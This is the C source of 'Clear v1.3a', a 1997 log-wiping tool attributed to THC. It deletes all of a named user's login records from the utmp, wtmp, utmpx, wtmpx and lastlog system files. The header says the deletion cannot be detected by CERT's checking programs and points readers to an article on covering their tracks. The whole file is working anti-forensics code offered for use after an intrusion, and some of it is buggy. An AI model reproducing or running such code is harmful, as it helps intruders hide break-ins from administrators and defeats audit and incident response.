/********************************************************************
 * Clear v1.3a (c) 1997 by van Hauser / [THC] - vh@campus.de        *
 *                                                                  *
 * CLEAR cleans all defined system logfiles from a user's login     *
 * data. (utmp, wtmp, utmpx, wtmpx and lastlog)                     *
 *                                                                  *
 * -> This deletion can't be detected like those done by zap, wipe, *
 *    etc. CERT's check programs chkwtmp and chklastlog won't work! * 
 *                                                                  *
 * -> #undef the system logfiles which do not exist on your system  *
 *                                                                  *
 * -> If you want to delete ZAP'ed-like entries from the logfiles   *
 *    then run "clear" with the username "0" (no quotes)            *
 *                                                                  *
 * -> Note that it deletes *all* entrys of the user in the logfiles!*
 *    Use Clear v1.3b if you want to delete just the newest entry.  *
 *                                                                  *
 * Don't forget to check the logfiles generated by syslogd !        *
 * And read the article COVER-1.THC from the THC-Magazine #3 on     *
 * more information on how to cover your tracks.                    *
 * It can be found at ftp.giga.or.at /pub/hacker/THC thc-mag3.zip   *
 *                                                                  *
 * If you finally need a good acct handler too, get ah-1_0b.tgz,    *
 * also in the THC-Magazine #3 ...                                  *
 ********************************************************************/

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>

/* all systems support utmp and wtmp */
#define WTMP_NAME "/var/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
/* utmpx and wtmpx are present on Sys VR4 systems. solaris, irix */
 /* #define WTMPX_NAME "/var/adm/wtmpx"
    #define UTMPX_NAME "/var/adm/utmpx"
 */
/* lastlog is present on linux, sunos, solaris, irix, ultrix
   osf, digital unix. Not on hpux and bsdi, freebsd and therelike. */
#define LASTLOG_NAME "/var/adm/lastlog"

#define TMP_NAME "/tmp/.XthcX.tmp"

#ifdef LASTLOG_NAME
#include <lastlog.h>
#endif
#ifdef WTMPX_NAME
#define TMPX
#include <utmpx.h>
#endif
#ifdef UTMPX_NAME
#ifndef WTMPX_NAME
#define TMPX
#include <utmpx.h>
#endif
#endif

#ifdef _PATH_UTMP
#undef UTMP_NAME
#define UTMP_NAME _PATH_UTMP
#endif
#ifdef _PATH_WTMP
#undef WTMP_NAME
#define WTMP_NAME _PATH_WTMP
#endif
#ifdef _PATH_LASTLOG
#undef LASTLOG_NAME
#define LASTLOG_NAME _PATH_LASTLOG
#endif
 
int f;
int g;
long found = 0;
    
int move_file(char to[100], char from[100])
{
    char buf[BUFSIZ];
    long readin;
    int result = 0;

    if ((f=open(from,O_RDONLY))>=0)
    {
        if ((g=open(to,O_WRONLY | O_CREAT | O_TRUNC))>=0)
        {
             while((readin = read(f, buf, sizeof(buf)))> 0)
                  write (g, buf, readin);
             close(g);
        } else {
             printf ("Can't write to file : %s\n", to);
             result += 2;
 	}
        close(f);
    } else {
        printf ("Can't open %s\n", from);
        result += 1;
    }
    return(result);
}

void kill_tmp(char *who, char file[100])
{
    struct utmp utmp_ent;
    long pos = 0L;
    found=0;

    if ((f=open(file,O_RDONLY))>=0) 
    {
        if ((g=open(TMP_NAME,O_WRONLY | O_CREAT | O_TRUNC, 0600))>=0)
        {
            while(pos != -1L) 
            {
                lseek(f,(long) ( pos * (long)(sizeof(struct utmp))), 0);
                if ( read(f, &utmp_ent, sizeof (struct utmp)) < sizeof (struct utmp) ) 
                {
                    pos = -1L;
                } else {
                        if (strncmp(utmp_ent.ut_name,who,strlen(who) == 0 ? 1 : strlen(who))) 
                        {
	      		    write (g, &utmp_ent, sizeof (utmp_ent));
                            pos += 1L;
                        } else {
                            if ((strlen(who) == 0) && (utmp_ent.ut_time != 0))
                            {
                                 write (g, &utmp_ent, sizeof (utmp_ent));
                            } else {
				 found++;
			    } 
                            pos += 1L;
                        }
                }
            }
            close(f);
            close(g);
            if (move_file(file, TMP_NAME))
                printf ("Can't move file %s to %s\n, file, TMP_NAME"); 
        } else {
             printf ("Can't write tmp file : %s\n", TMP_NAME);
             close(f);
        }
    } else  
        fprintf(stderr,"Can't find %s\n", file);
}

#ifdef TMPX
void kill_tmpx(char *who, char file[100])
{
    struct utmpx utmp_ent;
    long pos = 0L;
    found=0;
           
    if ((f=open(file,O_RDONLY))>=0)
    {
        if ((g=open(TMP_NAME,O_WRONLY | O_CREAT | O_TRUNC, 0600))>=0)
        {
            while(pos != -1L)
            {
                lseek(f,(long)( (sizeof(struct utmp)) * pos), 0);
                if (read (f, &utmp_ent, sizeof (struct utmp))< sizeof (struct utmp))
                {
                    pos = -1L;
                } else {
                        if (strncmp(utmp_ent.ut_name,who,strlen(who) == 0 ? 1 : strlen(who)))
                        {
                            write (g, &utmp_ent, sizeof (utmp_ent));
                            pos += 1L;
                        } else {
                            if ((strlen(who) == 0) && (utmp_ent.ut_xtime != 0))
                            {
                            	write (g, &utmp_ent, sizeof (utmp_ent));
                            } else {
                                found++;
                            }
                            pos += 1L;
                        }
                }
            }
            close(f);
            close(g);
            if (move_file(file, TMP_NAME))
                printf ("Can't move file %s to %s\n, file, TMP_NAME");
        } else {
            printf ("Can't write tmp file : %s\n", TMP_NAME);
            close(f);
        }
    } else
        fprintf(stderr,"Can't find %s\n", file);
}
#endif

void kill_lastlog(char *who)
{
    struct passwd *pwd;
    struct lastlog newll;
 
    if ((pwd=getpwnam(who))!=NULL) 
    {
        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) 
        {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            newll.ll_time=0;
            bzero((char *)&newll.ll_line, strlen(newll.ll_line));
            bzero((char *)&newll.ll_host, strlen(newll.ll_host));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        } else { 
            printf ("Can't find lastlog in %s\n", LASTLOG_NAME);
        }
    } else 
        fprintf(stderr," Can't find user %s in passwd\n",who);
}

 
main(int argc, char *argv[])
{
#ifndef TMP_NAME
    fprintf(stderr,"TMP_NAME not defined. Edit source and recompile ...\n");
    return(1);
#endif

    if (argc==2) {
    
    if (!strcmp(argv[1],"0"))
    {
	fprintf(stderr, "Killing Zap'ed entries -> ");
    	argv[1] = "";
    };

    
#ifdef WTMP_NAME
	fprintf(stderr,"wtmp ... ");
        kill_tmp(argv[1], WTMP_NAME);
#endif
#ifdef WTMPX_NAME
	fprintf(stderr,"wtmpx ... ");
        kill_tmpx(argv[1], WTMPX_NAME);
#endif
#ifdef UTMP_NAME
	fprintf(stderr,"utmp ... ");
        kill_tmp(argv[1], UTMP_NAME);
#endif
#ifdef UTMPX_NAME
        fprintf(stderr,"utmpx ... ");
        kill_tmpx(argv[1], UTMPX_NAME);
#endif
#ifdef LASTLOG_NAME
        if (argv[1] != "")
        {
            fprintf(stderr,"lastlog ... ");
            kill_lastlog(argv[1]);
        }
#endif
        if (unlink(TMP_NAME) < 0)
            fprintf(stderr,"Can't remove %s, do it by hand ... ",TMP_NAME);
        fprintf(stderr,"Done!\n");
        if (argv[1] != "")
            fprintf(stderr,"Stage cleared from user %s\n",argv[1]);
        else
            fprintf(stderr,"Stage cleared from Zap'ed entries\n");
    } else
        fprintf(stderr,"Usage : %s username\n",argv[0]);           
}
